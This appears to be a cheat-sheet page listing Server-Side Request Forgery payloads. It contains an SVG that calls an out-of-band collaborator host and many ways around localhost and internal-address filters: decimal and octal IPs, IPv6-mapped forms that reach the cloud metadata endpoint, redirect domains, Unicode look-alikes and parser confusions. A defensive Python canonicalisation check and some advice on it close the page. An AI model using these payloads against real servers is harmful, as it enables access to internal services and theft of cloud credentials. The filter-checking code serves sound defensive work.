pwny.cc
Server Side Request Forgery (SSRF)

Payloads

SSRF in SVG file

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">
  <image height="200" width="200" xlink:href="http://burpcollaborator.com/image.jpeg" />
</svg>

Localhost Bypasses

Using [::]

http://[::]:80/ #HTTP
http://[::]:25/ #SMTP
http://[::]:22/ #SSH
http://[::]:3128/ #SQUID
http://0000::1:80/ #HTTP
http://0000::1:25/ #SMTP
http://0000::1:22/ #SSH
http://0000::1:3128/ #SQUID

Using a domain redirection

http://spoofed.burpcollaborator.net
http://localtest.me
http://customer1.app.localhost.my.company.127.0.0.1.nip.io
http://mail.ebc.apple.com redirect to 127.0.0.6 == localhost
http://bugbounty.dod.network redirect to 127.0.0.2 == localhost

Using CIDR

http://127.127.127.127
http://127.0.1.3
http://127.0.0.0

Using decimal IP location

http://2130706433/ = http://127.0.0.1
http://3232235521/ = http://192.168.0.1
http://3232235777/ = http://192.168.1.1
http://2852039166/ = http://169.254.169.254

Using Octal IP

http://0177.0.0.1/ = http://127.0.0.1
http://o177.0.0.1/ = http://127.0.0.1
http://0o177.0.0.1/ = http://127.0.0.1
http://q177.0.0.1/ = http://127.0.0.1

Using IPv6/IPv4 Address Embedding

http://[0:0:0:0:0:ffff:127.0.0.1]

#Cloud Metadata
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]

Using malformed urls

localhost:+11211aaa
localhost:00011211aaaa

Using weird address

http://0/
http://127.1
http://127.0.1

Using enclosed alphanumerics

http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com

List:
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿

Against a weak parser

http://127.1.1.1:80\@127.2.2.2:80/
http://127.1.1.1:80\@@127.2.2.2:80/
http://127.1.1.1:80:\@@127.2.2.2:80/
http://127.1.1.1:80#\@127.2.2.2:80/
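
Seen from the defending side, the decimal, octal, short-form, IPv4-mapped IPv6 and enclosed-alphanumeric hosts listed above all collapse to a single address once the host is canonicalised before the allow/deny decision, while the domain-redirection entries can only be judged after DNS resolution. The Python check below is an added example, not part of the original page; the function names `parse_ipv4_loose` and `classify` and the verdict strings are assumptions made for illustration.

```python
import ipaddress
import unicodedata
from urllib.parse import urlsplit

def parse_ipv4_loose(host):
    """inet_aton-style IPv4: 1-4 parts, each decimal, octal (0...) or hex (0x...)."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    nums = []
    for p in parts:
        if not (p.isascii() and p.isalnum()):
            return None
        base = 16 if p.startswith("0x") else 8 if p[0] == "0" and len(p) > 1 else 10
        try:
            nums.append(int(p, base))
        except ValueError:
            return None  # not numeric: an ordinary hostname
    *head, last = nums  # the last part fills all remaining bytes
    if any(n > 255 for n in head) or last >= 256 ** (4 - len(head)):
        return None
    value = last + sum(n << (8 * (3 - i)) for i, n in enumerate(head))
    return ipaddress.IPv4Address(value)

def classify(url):
    # urlsplit lowercases the host and strips IPv6 brackets; NFKC folds
    # enclosed alphanumerics to plain ASCII.
    host = unicodedata.normalize("NFKC", urlsplit(url).hostname or "").lower().rstrip(".")
    if ":" in host:
        try:
            ip = ipaddress.ip_address(host)
        except ValueError:
            return ("block", host)  # malformed IPv6 literal
        ip = ip.ipv4_mapped or ip  # unwrap ::ffff:a.b.c.d
    else:
        ip = parse_ipv4_loose(host)
    if ip is None:
        # A name: string checks cannot see where DNS points. Assumption: the
        # caller resolves it, runs the same check on the IP, and pins that IP.
        return ("resolve-then-check" if host else "block", host)
    internal = (ip.is_loopback or ip.is_private or ip.is_link_local
                or ip.is_unspecified or ip.is_reserved or ip.is_multicast)
    return ("block" if internal else "allow", str(ip))

if __name__ == "__main__":
    # Sample URLs taken from the payload lists on this page.
    for u in ("http://2130706433/", "http://0177.0.0.1/", "http://127.1",
              "http://[::ffff:169.254.169.254]", "http://localtest.me"):
        print(u, "->", classify(u))
```

The check has to run on the address the HTTP client actually connects to, and again on every redirect hop, otherwise a name that passes validation can still lead to an internal address.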
